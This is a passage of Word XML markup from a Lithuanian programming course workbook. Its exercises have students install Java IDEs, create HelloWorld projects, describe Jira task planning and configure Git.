      <w:tr w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:trHeight w:val="732"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>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r>
      <w:tr w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:trHeight w:val="717"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>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r>
      <w:tr w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:trHeight w:val="732"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>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r>
      <w:tr w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:trHeight w:val="717"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>4.</w:t>
            </w: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r>
      <w:tr w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidTr="009D6E00">
        <w:trPr>
          <w:trHeight w:val="732"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="817" w:type="dxa"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
              <w:t>5.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1418"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55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315"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c>
          <w:tcPr>
            <w:tcW w:w="1449" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00F55F68" w:rsidRPr="00AD4464" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
            <w:pPr>
              <w:spacing w:after="160"/>
              <w:ind w:right="282"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="lt-LT"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="160"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pP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3 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PARSISIŲSKITE, ĮSIDIEKITE IR SUSIKONFIGŪRUOKITE INTEGRUOTĄ KŪRIMO APLINKĄ</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Rinkitės Eclipse for Java EE Developers versiją</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4 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PARSISIŲSKITE, ĮSIDIEKITE IR SUSIKONFIGŪRUOKITE INTELLIJ</w:t>
      </w:r>
      <w:r w:rsidR="00B12444" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> IDEA INTEGRUOTĄ KŪRIMO APLINKĄ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="160"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Rinkitės Intellij Idea Community versiją</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5 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>PARSISIŲSKITE, ĮSIDIEKITE IR SUSIKONFIGŪRUOKITE APACHE NETBEANS INTEGRUOTĄ KŪRIMO APLINKĄ</w:t>
      </w:r>
      <w:r w:rsidR="00850D0A">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="160"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Rinkitės paskutinę stabilią IDE versiją.</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6 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>APRAŠYKITE PAGRINDINES ECLIPSE IDE APLINKOS FUNKCIJAS (FEATURE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7 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>APRAŠYKITE PAGRINDINES INTELLIJ IDEA IDE APLINKOS FUNKCIJAS (FEATURE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8 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>APRAŠYKITE PAGRINDINES NETBEANS IDE APLINKOS FUNKCIJAS (FEATURE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9 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUKURKITE NAUJĄ JAVA PROJEKTĄ SU ECLIPSE ID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Projekto pavadinimas Eclipse Java Project, paketo pavadinimas eclipse.java, klasės pav</w:t>
      </w:r>
      <w:r w:rsidR="0087304D" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>adinimas HelloWorld.java</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10 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUKURKITE NAUJĄ JAVA PROJEKTĄ SU INTELLIJ IDEA ID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Projekto pavadinimas Intellij Idea Java Project, paketo pavadinimas intellij.idea.java, kla</w:t>
      </w:r>
      <w:r w:rsidR="00853F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sės pavadinimas HelloWorld.java</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11 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUKURKITE NAUJĄ JAVA PROJEKTĄ SU NETBEANS ID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Projekto pavadinimas NetBeans Java Project, paketo pavadinimas netbeans.java, kla</w:t>
      </w:r>
      <w:r w:rsidR="00853F29" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>sės pavadinimas HelloWorld.java</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12 užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E608BD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">SUKURTAM JAVA PROJEKTUI </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>9 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00E608BD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUKONFIGŪRUOKITE GIT ĮRANKĮ</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13 užduotis. </w:t>
      </w:r>
      <w:r w:rsidR="00E608BD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">SUKURTAM JAVA PROJEKTUI </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>10 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00E608BD" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>SUKONFIGŪRUOKITE GIT ĮRANKĮ</w:t>
      </w:r>
      <w:r w:rsidR="00850D0A">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00850D0A" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="227" w:name="_Toc2088600580"/>
      <w:bookmarkStart w:id="228" w:name="_Toc10443991"/>
      <w:bookmarkStart w:id="229" w:name="_Toc13095540"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">3.2. </w:t>
      </w:r>
      <w:r w:rsidR="00F55F68" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="230" w:name="_Toc13833434"/>
      <w:bookmarkStart w:id="231" w:name="_Toc14392465"/>
      <w:r w:rsidR="00F55F68" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Sekti programavimo darbų vykdymą naudojant komandinio darbų planavimo sistemas.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="227"/>
      <w:bookmarkEnd w:id="228"/>
      <w:bookmarkEnd w:id="229"/>
      <w:bookmarkEnd w:id="230"/>
      <w:bookmarkEnd w:id="231"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="160"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. UŽRAŠYKITE PAGRINDINIUS PROGRAMINĖS ĮRANGOS KŪRIMO ETAPU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2 užduotis. </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>APRAŠYKITE PROGRAMINĖS ĮRANGOS GYVAVIMO CIKLĄ</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3 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. UŽRAŠYKITE TRIS KOMANDINIO DARBŲ PLANAVIMO SISTEMA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 xml:space="preserve"> 4 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> APRAŠYKITE JIRA FUNKCIONALUMĄ IR PANAUDOJIMO GALIMYBES KURIANT IR TESTUOJANT PROGRAMINĘ ĮRANGĄ</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5 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> APRAŠYKITE PAGRINDINIUS JIRA SISTEMOS APLINKOS ELEMENTUS PAPRASTAM VARTOTOJUI</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6 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> APRAŠYKITE KAIP YRA VYKDOMAS PROJEKTINIS DARBAS JIRA DARBŲ PLANAVIMO SISTEMOJ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7 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. APRAŠYKITE KAIP YRA PLANUOJAMOS, SUKURIAMOS, APRAŠOMOS UŽDUOTYS JIRA DARBŲ PLANAVIMO SISTEMOJ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8 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> APRAŠYKITE KAIP YRA PRISKIRIAMI DARBAI (U</w:t>
      </w:r>
      <w:r w:rsidR="004A5E7F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ŽDUOTYS) ATSKIRIEMS VARTOTOJAM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Papildomai aprašykite kaip užduotys yra komentuojamo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9 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> APRAŠYKITE KAIP YRA UŽBAIGIAMI DARBAI (UŽDUOTYS) JIRA DARBŲ PLANAVIMO SISTEMOJE. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="160"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Papildomai aprašykite kaip atrodo TODO sąraša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10 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. APRAŠYKITE KAIP YRA VYKDOMA PAIEŠKA JIRA DARBŲ PLANAVIMO SISTEMOJE</w:t>
      </w:r>
      <w:r w:rsidR="00850D0A">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="160"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="232" w:name="_Toc2103959397"/>
      <w:bookmarkStart w:id="233" w:name="_Toc10443992"/>
      <w:bookmarkStart w:id="234" w:name="_Toc13095541"/>
      <w:bookmarkStart w:id="235" w:name="_Toc13833435"/>
      <w:bookmarkStart w:id="236" w:name="_Toc14392466"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00850D0A" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="160"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002E36AD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00F55F68" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Mokymosi rezultatas. Vykdyti programinio kodo versijavimą naudojant programinio kodo versijavimo įrankius, tinkamus </w:t>
      </w:r>
      <w:bookmarkEnd w:id="232"/>
      <w:bookmarkEnd w:id="233"/>
      <w:bookmarkEnd w:id="234"/>
      <w:bookmarkEnd w:id="235"/>
      <w:bookmarkEnd w:id="236"/>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>pasirinktai programavimo kalbai.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="160"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. UŽRAŠYKITE TRIS KODO VERSIJŲ KONTROLĖS SISTEMAS, APRAŠYKITE PAGRINDINES VERSIJAVIMO SISTEMŲ FUNKCIJAS</w:t>
      </w:r>
      <w:r w:rsidR="00850D0A">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="160"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Papildomai parašykite pavyzdžių kaip versijavimo įrankiai gali būti naudojamos pr</w:t>
      </w:r>
      <w:r w:rsidR="004A5E7F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ogramuotojo praktinėje veikloj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2 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PARSISIŲSKITE, ĮSIDIEKITE GIT KODO VERSIJAVIMO ĮRANKĮ</w:t>
      </w:r>
      <w:r w:rsidR="00850D0A">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="160"/>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKONFIGŪRUOKITE GIT SAUGYKLĄ: NUSTATYKITE GIT VARTOTOJO VARDĄ, ELEKTRONINĮ PAŠTĄ, NAUDOJAMĄ TEKSTINĮ REDAKTORIŲ</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4 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> PAPILDYKITE SAVO GIT KONFIGŪRACIJĄ (žiūrėti </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>3 užduotį</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>) PARAMETRAIS: COMMIT.TEMPLATE, CORE.PAGER, CORE.EXCLUDEFILE, HELP.AUTOCORRECT, COLOR.*</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00F55F68" w:rsidP="00372B3A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:after="160"/>
